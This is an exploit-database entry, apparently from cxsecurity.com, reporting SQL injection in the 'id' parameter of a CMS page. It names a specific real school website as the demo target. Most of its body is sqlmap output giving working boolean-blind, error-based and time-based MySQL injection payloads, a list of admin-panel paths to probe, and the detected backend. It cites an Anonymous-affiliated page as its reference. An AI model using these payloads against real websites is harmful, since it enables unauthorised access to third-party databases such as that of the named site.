Error In Database At The Beginning Of Page - SQLi - SQLinjection

2017.08.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

-- Fecha: 5/08/2017 -- Win10 -- http(s)//:site.com/admin, admincp , admin.html ,admin.php , etc. -- Demo: === http://www.gymnasium-lichtenstein.de/cms/index.php?id=83 -- PoFF: ======= * ======= * Parameter: id (GET) ======= Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=83' AND 2370=2370 AND 'PElS'='PElS ======= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=83' AND (SELECT 5255 FROM(SELECT COUNT(*),CONCAT(0x716a786b71,(SELECT (ELT(5255=5255,1))),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'sIDg'='sIDg ======= Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=83' AND SLEEP(5) AND 'ecpY'='ecpY --- [04:16:39] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL >= 5.0

References:

https://www.facebook.com/Informacion-Anonymous-611394289006994/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top